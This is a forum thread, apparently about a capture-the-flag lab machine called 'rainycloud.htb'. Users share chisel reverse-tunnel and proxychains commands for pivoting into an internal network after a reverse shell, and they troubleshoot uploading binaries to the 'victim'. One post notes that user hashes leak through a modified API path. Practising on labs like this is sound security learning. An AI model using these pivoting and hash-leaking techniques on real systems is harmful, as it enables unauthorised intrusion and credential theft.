(October 27, 2022, 09:23 PM)Periyamaruthu Wrote:

(October 27, 2022, 03:54 PM)ben10 Wrote:

(October 16, 2022, 11:48 PM)lnf02 Wrote: Once you get inside the Host, you will need to escalate privileges (as always)... 

I think you will find this useful ;)

lets see

Hi Friends... I wanna push "chisel" binary file from my kali machine to client then planing to create reverse tunnel... whereas I am stuck here itself... I executed python simple http server in kali machine from there I could use "wget" command to pull the chisel file (in local machine itself), whereas I use wget command from container (after getting reverse shell access) it say refused.... Please assist me ...

You won't be able to run any of your own binaries on that system. Check your userid, you are 1000 IIRC, check /etc/passwd, you'll see 1000 doesn't exist on your first foothold, so you can't run any files created with that user. You need to move to a place where your user is recognised.

the patched box seems really finnicky - not sure what the intended route is now that you can't hash a blank password

(October 15, 2022, 10:19 PM)yumi Wrote: with chisel better you proxychains with socks5

you will able to  run nmap and another tools.

you can put in you browser proxy settings 127.0.0.1 sock5 port and  change in you /etc/hosts ip 172.18.0.1


./chisel server -p 8001 --reverse

./chisel client IP:8001 R:1080:socks

edit /etc/proxychains4.conf

socks5 127.0.0.1 1080

test proxychains nmap 172.18.0.1 

all good ?

add in you browser 127.0.0.1 1080 sock5 and try access again dev.rainycloud.htb

if you are using foxyproxy addon. disable Send DNS through SOCKS5 proxy

Hi Dude,
   I have an below error while executing "Chisel", could you help me on this...
Step 1: Uploaded Chisel from kali machine to victim machine through python http server
Step 2: Moved the chisel to /tmp folder where users has all permissions
Step 3: chmod 777 chisel Or chmod +rwx chisel, changed permission to execute the file....

   Now I am getting below error, even I tried in multiple times in different ways... I am trying more than 4 days... still I am getting "./chisel: not found".

./chisel client 10.10.22.22:2222 R:6998:172.18.0.3:8118
sh: ./chisel: not found
/tmp $ ^[[58;8R

(November 1, 2022, 06:27 PM)Periyamaruthu Wrote:

(October 15, 2022, 10:19 PM)yumi Wrote: with chisel better you proxychains with socks5

you will able to  run nmap and another tools.

you can put in you browser proxy settings 127.0.0.1 sock5 port and  change in you /etc/hosts ip 172.18.0.1


./chisel server -p 8001 --reverse

./chisel client IP:8001 R:1080:socks

edit /etc/proxychains4.conf

socks5 127.0.0.1 1080

test proxychains nmap 172.18.0.1 

all good ?

add in you browser 127.0.0.1 1080 sock5 and try access again dev.rainycloud.htb

if you are using foxyproxy addon. disable Send DNS through SOCKS5 proxy

Hi Dude,
   I have an below error while executing "Chisel", could you help me on this...
Step 1: Uploaded Chisel from kali machine to victim machine through python http server
Step 2: Moved the chisel to /tmp folder where users has all permissions
Step 3: chmod 777 chisel Or chmod +rwx chisel, changed permission to execute the file....

   Now I am getting below error, even I tried in multiple times in different ways... I am trying more than 4 days... still I am getting "./chisel: not found".

./chisel client 10.10.22.22:2222 R:6998:172.18.0.3:8118
sh: ./chisel: not found
/tmp $ ^[[58;8R

You're likely getting that error because the operating system is 32 bit and your binary is 64 bit. Try uploading a 32 bit version of chisel

thanks bro

(October 16, 2022, 11:48 PM)lnf02 Wrote: Once you get inside the Host, you will need to escalate privileges (as always)... 

I think you will find this useful ;)

Thanks

(November 2, 2022, 07:12 PM)Xgh0stX Wrote:

(November 1, 2022, 06:27 PM)Periyamaruthu Wrote:

(October 15, 2022, 10:19 PM)yumi Wrote: with chisel better you proxychains with socks5

you will able to  run nmap and another tools.

you can put in you browser proxy settings 127.0.0.1 sock5 port and  change in you /etc/hosts ip 172.18.0.1


./chisel server -p 8001 --reverse

./chisel client IP:8001 R:1080:socks

edit /etc/proxychains4.conf

socks5 127.0.0.1 1080

test proxychains nmap 172.18.0.1 

all good ?

add in you browser 127.0.0.1 1080 sock5 and try access again dev.rainycloud.htb

if you are using foxyproxy addon. disable Send DNS through SOCKS5 proxy

Hi Dude,
   I have an below error while executing "Chisel", could you help me on this...
Step 1: Uploaded Chisel from kali machine to victim machine through python http server
Step 2: Moved the chisel to /tmp folder where users has all permissions
Step 3: chmod 777 chisel Or chmod +rwx chisel, changed permission to execute the file....

   Now I am getting below error, even I tried in multiple times in different ways... I am trying more than 4 days... still I am getting "./chisel: not found".

./chisel client 10.10.22.22:2222 R:6998:172.18.0.3:8118
sh: ./chisel: not found
/tmp $ ^[[58;8R

You're likely getting that error because the operating system is 32 bit and your binary is 64 bit. Try uploading a 32 bit version of chisel

 Great ... such a wonderful help... How I missed that point, seems my blind gone by overthinking :-) ...  Let me try again and let you know...

need to verify something for this machine..

i got 404 error page when trying to access /login/ and /register/ page..

did i miss something along the way?

well this box is interesting lol. I was able to leak user hashes by requesting http://rainycloud.htb/api/user/1.0 instead of http://rainycloud.htb/api/user/1

Hey guys, does anyone has a hint for the hash_password.py?